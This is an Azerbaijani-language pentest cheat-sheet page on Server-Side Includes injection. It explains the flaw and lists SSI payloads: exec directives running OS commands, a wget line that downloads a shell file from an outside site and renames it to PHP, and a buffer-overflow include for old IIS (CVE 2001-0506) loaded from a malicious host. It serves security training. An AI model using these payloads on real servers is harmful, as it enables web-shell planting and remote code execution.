Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Ümumi məlumat
  • Nümunələr
  • Nümunə 1
  • Nümunə 2
  • Nümunə 3

Was this helpful?

  1. Web Pentesting

Server-Side Includes (SSI) Injection

Ümumi məlumat

SSI-lər dinamik məzmunlu HTML səhifəsini qidalandırmaq üçün istifadə edilən Veb proqramlarında mövcud olan direktivlərdir. Onlar CGI-lərə bənzəyir, SSI-lər cari səhifə yüklənməmişdən əvvəl və ya səhifə vizuallaşdırılarkən bəzi hərəkətləri yerinə yetirmək üçün istifadə olunur. Bunu etmək üçün veb server səhifəni istifadəçiyə təqdim etməzdən əvvəl SSI-ni təhlil edir.

Server Side Includes hücumu HTML səhifələrinə skriptlər yeritməklə və ya uzaqdan ixtiyari kodları icra etməklə veb proqramın istismarına imkan verir. Tətbiqdə istifadə olunan SSI-nin manipulyasiyası yolu ilə istifadə edilə bilər və ya istifadəçi giriş sahələri vasitəsilə istifadəyə məcbur edilə bilər.

Tətbiqin SSI direktivlərində istifadə olunan simvolları daxil etməklə, giriş sahələri məlumatlarını düzgün şəkildə təsdiqləyib-yoxlamadığını yoxlamaq mümkündür, məsələn:

< ! # = / . " - > and [a-zA-Z0-9]

Tətbiqin həssas olub olmadığını aşkar etməyin başqa bir yolu .stm, .shtm və .shtml uzantılı səhifələrin mövcudluğunu yoxlamaqdır. Lakin bu tip səhifələrin olmaması tətbiqin SSI hücumlarına qarşı qorunduğu anlamına gəlmir.

İstənilən halda, hücum yalnız o halda uğurlu olacaq ki, veb-server lazımi yoxlama olmadan SSI-nin icrasına icazə versin. Bu, veb server proses sahibinin icazəsi ilə fayl sisteminə və prosesə giriş və manipulyasiyaya səbəb ola bilər.

Təcavüzkar parol faylları kimi həssas məlumatlara daxil ola və qabıq əmrlərini yerinə yetirə bilər. SSI direktivləri giriş sahələrinə daxil edilir və veb serverə göndərilir. Veb server səhifəni təqdim etməzdən əvvəl direktivləri təhlil edir və icra edir. Sonra, növbəti dəfə istifadəçinin brauzeri üçün səhifə yükləndikdə hücumun nəticəsi görünəcək.

Nümunələr

Nümunə 1

SSI inyeksiyası üçün istifadə edilən əmrlər istifadə olunan server əməliyyat sisteminə görə dəyişir. Aşağıdakı əmrlər OS əmrlərini yerinə yetirmək üçün istifadə edilməli olan sintaksisi təmsil edir.

Linux:

Kataloq fayllarının siyahısı:

<!--#exec cmd="ls" -->

Kataloqlara giriş:

<!--#exec cmd="cd /root/dir/">

İcra skripti:

<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->

Windows:

Kataloq fayllarının siyahısı:

<!--#exec cmd="dir" -->

Kataloqlara giriş:

<!--#exec cmd="cd C:\admin\dir">

Nümunə 2

Server məlumatlarına daxil olmaq və qurmaq üçün istifadə edilə bilən digər SSI nümunələri:

Səhv mesajının çıxışını dəyişdirmək üçün:

<!--#config errmsg="File not found, informs users and password"-->

Cari sənəd fayl adını göstərmək üçün:

<!--#echo var="DOCUMENT_NAME" -->

Virtual yolu və fayl adını göstərmək üçün:

<!--#echo var="DOCUMENT_URI" -->

“config” əmrindən və “timefmt” parametrindən istifadə edərək tarix və vaxtın çıxış formatını idarə etmək mümkündür:

<!--#config timefmt="A %B %d %Y %r"-->

“Fsize” əmrindən istifadə etməklə seçilmiş faylın ölçüsünü çap etmək mümkündür:

<!--#fsize file="ssi.shtml" -->

Nümunə 3

ssi_over.shtml

<!--#include file=”UUUUUUUU...UU”-->

PS: “U” sayı 2049-dan uzun olmalıdır.

Proqramın ssi_over.shtml səhifəsini yükləməyə məcbur edilməsi:

Zərərli olmayan URL:

www.vulnerablesite.org/index.asp?page=news.asp

Zərərli URL:

www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml

IIS boş bir səhifə qaytarırsa, bu, daşmanın baş verdiyini göstərir. Bu halda, təcavüzkar prosedur axını ilə manipulyasiya edə və ixtiyari kodu icra edə bilər.

PreviousXPATH enjeksiyonuNextEdge Side Inclusion Injection (ESII)

Last updated 1 year ago

Was this helpful?

IIS 4.0 və 5.0 versiyalarındakı köhnə boşluq təcavüzkarın dinamik keçid kitabxanasında (ssinc.dll) bufer daşması xətası vasitəsilə sistem imtiyazlarını əldə etməyə imkan verir. “ssinc.dll” Server-Side Inclus prosesini tərcümə etmək üçün istifadə olunur. .

Aşağıdakı SSI kodunu ehtiva edən zərərli səhifə yaratmaq və tətbiqi bu səhifəni yükləməyə məcbur etməklə ( hücumu), bu hücumu həyata keçirmək mümkündür:

CVE 2001-0506
Path Traversal